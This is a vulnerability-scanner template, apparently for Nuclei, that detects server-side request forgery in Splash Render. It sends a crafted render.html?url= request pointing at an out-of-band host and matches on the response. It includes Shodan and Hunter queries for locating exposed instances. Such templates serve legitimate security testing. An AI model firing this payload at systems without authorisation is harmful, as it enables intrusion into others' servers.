id: splash-render-ssrf

info:
  name: Splash Render - SSRF
  author: pwnhxl
  severity: high
  description: Splash Render is vulnerable to Server-Side Request Forgery (SSRF) Vulnerability.
  reference:
    - https://github.com/scrapinghub/splash
    - https://b1ngz.github.io/splash-ssrf-to-get-server-root-privilege/
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"Splash"
    hunter-query: web.title="Splash" && header="TwistedWeb"
  tags: splash,ssrf,oast,oss

http:
  - method: GET
    path:
      - "{{BaseURL}}/render.html?url=https://oast.live"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Interactsh Server'

      - type: status
        status:
          - 200
# digest: 4a0a0047304502200582ef3ecc5d0fe82668fe963fd2ec2b015ddf730410422894d89b53ede4a05f022100d3c1e2907847b4e232292bd1d7fd5d1cd432bcfe7c032743680ed0d838509bb8:922c64590222798bb761d5b6d8e72950